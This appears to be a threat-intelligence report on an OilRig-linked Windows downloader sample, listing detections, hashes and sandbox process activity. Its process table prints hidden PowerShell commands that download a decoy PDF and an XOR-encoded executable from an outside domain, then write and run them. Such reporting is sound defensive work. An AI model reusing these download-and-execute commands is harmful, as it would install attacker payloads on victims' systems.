Classification: Malicious
bounty-75588024838477202 is a malicious file sample. Linked to Oilrig activity. Reported by 2 threat sources, last seen 2023-04-28.
Detection summary
- 29 antivirus detections (41% detection ratio)
- 0 IDS alerts
- 6 processes observed
- 0 contacted hosts
- 1 DNS requests
Blacklist sightings
| Description |
Source |
First seen |
Last seen |
Labels |
MITRE ATT&CK |
| OilRig |
Maltiverse |
2023-04-27 04:25:14 |
2023-04-28 14:38:36 |
malicious-activity
|
G0049 OilRig
|
| Dev-0270 |
Maltiverse |
2023-04-27 04:25:14 |
2023-04-28 14:38:35 |
malicious-activity
|
|
| Generic Malware |
Hybrid-Analysis |
2023-04-27 09:00:03 |
2023-04-27 09:00:03 |
|
|
Tags
apt
apt34
downloader
Sample information
- Filenames
- bounty-75588024838477202
- File type
- PE32+ executable (console) x86-64, for MS Windows
- Size
- 19968 bytes
- MD5
3a076df50b657974143a3fbf9ba64aa2
- SHA-1
35c18eff09954f527469bf347dfeee34fc9389e3
- SHA-256
e5ba06943abb666f69f757fcd591dd1cceb66cad698fb894d9bc8911282198c4
- First indexed
- 2023-04-27 08:24:34
- Last updated
- 2026-09-18 06:59:30
Antivirus detections
| Engine | Detection |
| Lionic | Trojan.Win32.Alien.4!c |
| Elastic | malicious (moderate confidence) |
| Cynet | Malicious (score: 99) |
| ALYac | Trojan.GenericKD.66644193 |
| Zillya | Trojan.Alien.Win64.181 |
| BitDefender | Trojan.GenericKD.66644193 |
| Symantec | Trojan Horse |
| ESET-NOD32 | PowerShell/TrojanDownloader.Agent.GVO |
| Paloalto | generic.ml |
| Kaspersky | Trojan.Win64.Alien.ahc |
| MicroWorld-eScan | Trojan.GenericKD.66644193 |
| Rising | Downloader.Agent/PS!8.1250D (CLOUD) |
| Emsisoft | Trojan.GenericKD.66644193 (B) |
| F-Secure | Trojan.TR/Dldr.Agent.naaui |
| VIPRE | Trojan.GenericKD.66644193 |
| McAfee-GW-Edition | BehavesLike.Win64.BadFile.lm |
| FireEye | Trojan.GenericKD.66644193 |
| Sophos | Mal/Generic-S |
| Avira | TR/Dldr.Agent.naaui |
| MAX | malware (ai score=88) |
| Antiy-AVL | Trojan/Win64.Alien |
| Arcabit | Trojan.Generic.D3F8E8E1 |
| ZoneAlarm | Trojan.Win64.Alien.ahc |
| GData | Trojan.GenericKD.66644193 |
| McAfee | Artemis!3A076DF50B65 |
| Cylance | unsafe |
| Panda | Trj/Chgt.AD |
| MaxSecure | Trojan.Malware.300983.susgen |
| DeepInstinct | MALICIOUS |
Process list
| Name | Command line |
| bounty-75588024838477202.exe | |
| cmd.exe | /c powershell -WindowStyle hidden $path = '%TEMP%\s2vc.0.pdf'; $wc = New-Object System.Net.WebClient; $bytes = $wc.DownloadData('https://deersharpfork.info/dw85fgxtvzq/download/i/34624051816246d4a1a7f225d966d139/7e58169ee59d46e7a2be023e728c6205.jpg'); sc $path ([byte[]]($bytes)) -Encoding Byte; & %TEMP%\s2vc.0.pdf |
| powershell.exe | powershell -WindowStyle hidden $path = '%TEMP%\s2vc.0.pdf'; $wc = New-Object System.Net.WebClient; $bytes = $wc.DownloadData('https://deersharpfork.info/dw85fgxtvzq/download/i/34624051816246d4a1a7f225d966d139/7e58169ee59d46e7a2be023e728c6205.jpg'); sc $path ([byte[]]($bytes)) -Encoding Byte; |
| AcroRd32.exe | "%TEMP%\s2vc.0.pdf" |
| cmd.exe | /c powershell -WindowStyle hidden $path = '%TEMP%\s2vc.1.exe'; $wc = New-Object System.Net.WebClient; $bytes = $wc.DownloadData('https://deersharpfork.info/dw85fgxtvzq/download/f/bb14611f7aae441fb78f2ca919b800b5/7e58169ee59d46e7a2be023e728c6205'); for($i = 0; $i -lt $bytes.count; $i++) {$bytes[$i] = $bytes[$i] -bxor 0x25 }; sc $path ([byte[]]($bytes)) -Encoding Byte; ^& %TEMP%\s2vc.1.exe; |
| powershell.exe | powershell -WindowStyle hidden $path = '%TEMP%\s2vc.1.exe'; $wc = New-Object System.Net.WebClient; $bytes = $wc.DownloadData('https://deersharpfork.info/dw85fgxtvzq/download/f/bb14611f7aae441fb78f2ca919b800b5/7e58169ee59d46e7a2be023e728c6205'); for($i = 0; $i -lt $bytes.count; $i++) {$bytes[$i] = $bytes[$i] -bxor 0x25 }; sc $path ([byte[]]($bytes)) -Encoding Byte; & %TEMP%\s2vc.1.exe; |